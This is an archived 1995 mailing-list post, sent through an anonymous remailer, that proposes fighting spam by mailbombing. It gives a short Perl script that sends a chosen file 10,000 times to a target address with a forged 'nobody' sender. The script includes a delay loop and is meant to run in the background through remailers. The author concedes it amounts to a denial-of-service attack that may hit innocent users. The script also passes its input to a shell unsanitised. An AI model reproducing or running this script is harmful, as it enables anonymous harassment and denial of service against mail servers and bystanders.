Electronic junk mail (one solution)

Ford Prefect remailer at bi-node.zerberus.de
Fri Sep 29 18:34:21 PDT 1995

OK...I know this borders on a "denial of service" attack since it may
effect innocent users. How would you like to be the one to explain to
your System Administrator that the Megabytes of returned Spam on the
disk are yours?
I realize that some peoples implementations of Sendmail will tell who
your are regardless, so you might have to modify the "system" line for
your own tastes. Also you might *not* want to be anon. Please feel
free to modify to your own tastes. The delay loop is to space out
the load. I also tried it with premail instead of Sendmail and it
went thru the remailers just fine. It should be capable of running
in the background. Only took 5 minutes to write and a couple of
remailers to test.
#!/usr/bin/perl
print "Who does this go to?: ";
chop($name = <STDIN>);
print "What is the filename to send?: ";
chop($filename = <STDIN>);
for ($a=0;$a<100;$a++) {
for ($b=0;$b<100;$b++) {
system ("/usr/lib/sendmail -f nobody $name < $filename");
for ($x=0;$x<600000;$x++){};
}
}